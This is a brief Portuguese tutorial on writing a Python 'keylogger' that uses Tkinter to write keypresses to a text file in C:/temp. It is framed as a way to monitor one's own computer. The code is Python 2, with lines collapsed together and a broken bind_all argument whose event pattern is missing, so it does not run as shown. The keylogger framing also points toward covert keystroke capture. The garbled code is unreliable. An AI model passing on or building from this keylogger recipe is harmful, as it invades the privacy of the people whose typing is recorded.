Você pode criar um programa keylogger usando Python para capturar as teclas digitadas no teclado de um computador. Os pressionamentos de tecla são salvos em um arquivo de texto e ele registra todas as entradas. Você pode usar um keylogger para monitorar a atividade em seu computador.
Etapa 1
Inicie o IDLE, clique no menu "Arquivo" e selecione "Nova janela" para abrir uma nova janela. Pressione Ctrl e S para iniciar a janela "Salvar como". Use “getKeyLogger” como o nome do arquivo e clique em “Salvar”.
Etapa 2
Adicione a seguinte linha de código para importar o namespace "Tkinter" e defina o caminho do arquivo que deseja usar para registrar:
import Tkinter as tk myFile =open("C:/temp/keyFile.txt", "w")
Etapa 3
Copie e cole o código a seguir para salvar cada pressionamento de tecla no arquivo:
def keypress(event):if event.keysym =='Escape':main.destroy() keyPressed =event.char myFile.write(keyPressed)
Etapa 4
Adicione o seguinte código para que um usuário saiba que ele pode começar a digitar e que ele pode pressionar Esc para encerrar o programa:
main =tk.Tk() print "Pressione qualquer tecla (tecla Escape para sair):" main.bind_all('
', keypress) main.withdraw() main.mainloop() myFile.close() Etapa 5
Clique no botão Iniciar “Windows” e digite “cmd” na caixa “pesquisar programas e arquivos”. Pressione Enter para abrir o prompt de comando. Vá para "C:\Python
" e digite "python getKeyLogger". Pressione Enter para executar o programa. Vá para "C:/temp/" e clique duas vezes em "keyFile.txt" para visualizar os dados de pressionamento de tecla.